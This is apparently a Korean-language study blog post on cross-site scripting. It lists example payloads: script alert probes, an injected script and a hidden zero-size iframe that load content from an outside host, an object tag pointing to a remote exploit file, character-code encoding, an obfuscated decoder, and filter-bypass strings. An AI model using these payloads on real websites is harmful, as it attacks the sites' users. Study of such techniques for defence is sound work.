XSS (Cross Site Scripting) 크로스 사이트 스크립트은 서버의 서비스를 공격하는 일반적인 해킹방법이 아니라 해당 서버를 사용하는 사용자를 공격하는 기법이다.
1. XSS
일반적인 공격 기법은 <script>alert("XSS")</script> 이러한 구문을 넣음으로 취약점이 있는지 알아본다.
ex) 클릭시 타사이트로 이동
<a href="http://naver.com<script src='http://pwnplay.org/test'></script>">Click</a>
2. iframe 태그
타사이트로 연결 가능하게 함
ex) 숨겨진 iframe를 이용해 타사이트로 이동
<iframe src=" http://pwnplay.org" width="0" height="0" frameborder="0"></iframe>
3. object 태그
ex) 지정한 파일이 존재하지 않을 다사이트로 이동하도록 함.
<object width=0 height=0 sytle=display:none; type=text/xscriptlet data=mk:@MSITStore:mhtml:c:\nosuchfile.mht! http://pwnplay.org/attack_chm::exploit.html></object>
4. div 기법
ex) div 태그를 사용하여 이미지 등을 삽입시킨다.
<div style="position:absolute; left:200; top:90; z-index:2;">
<img src="images/test.jpg">
</div>
5. 인코딩 기법
ex) 공격하려는 문자열을 다른 표현으로 인코딩하여 눈에 띠지 않거나, IPS, 웹방화벽 드의 감지패턴을 우회하기 위하여 인코딩한다.
원본 : <script>alert("test");</script>
인코딩 : <script>alert(String.fromCharCode(116, 101, 115, 116))</script>
6. Obfuscated 기법
ex) 인코딩 기법과 같이 우회하기 위해 사용한다.
<s-ript language="javas-ript">
e = '0x00' + '5F';
str1 = "%E4%BC%B7%AA%C0%AD ....... %AA%E2";
str = tmp = '';
for(i=0; i<str1.length; i+=3)
{
tmp = unescape(str1.slice(i,i+3));
str = str + String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}
document.write(str);
</script>
7. 기타우회 방법
;</script><script>alert("xss");</script>
<scr<script>ipt>alert("xss");</scr</script>ipt>
[참조]http://egloos.zum.com/tiger5net/v/5055050
'Security Study > Web' 카테고리의 다른 글
string filter(php) (0) | 2016.10.05 |
---|---|
hosting 을하기위한 기본? (0) | 2015.12.13 |
웹 해킹 기본 (0) | 2015.11.24 |
구글 해킹 (0) | 2015.11.21 |
web 2일차 (0) | 2015.10.23 |
댓글0